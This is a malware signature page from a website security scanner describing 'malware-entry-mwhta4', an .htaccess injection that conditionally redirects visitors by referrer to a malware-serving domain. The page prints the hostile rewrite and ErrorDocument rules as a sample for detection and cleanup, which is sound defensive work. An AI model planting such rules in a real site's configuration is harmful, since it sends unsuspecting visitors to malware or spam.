SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-mwhta4

malware-entry-mwhta4

Description:

This attack uses .htaccess to redirect users to a site serving malware (or spam).

Loads malware from:

http://redrt.org.in
And other domains.

Affecting:

Any type of web site (no specific target).

Clean up and details:

Remove offendin code from .htaccess.

Links:

http://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess-malware.html

Malware sample:

.. RewriteCond %{HTTP_REFERER} .flickr. [NC,OR] RewriteCond %{HTTP_REFERER} .yahoo.$ [NC] RewriteRule .* http://redrt.org.in/in.cgi?4&parameter=0510 [R,L] ErrorDocument 400 http://redrt.org.in/in.cgi?4&parameter=0510 ErrorDocument 401 http://redrt.org.in/in.cgi?4&parameter=0510 ErrorDocument 403 http://redrt.org.in/in.cgi?4&parameter=0510 ErrorDocument 404 http://redrt.org.in/in.cgi?4&parameter=0510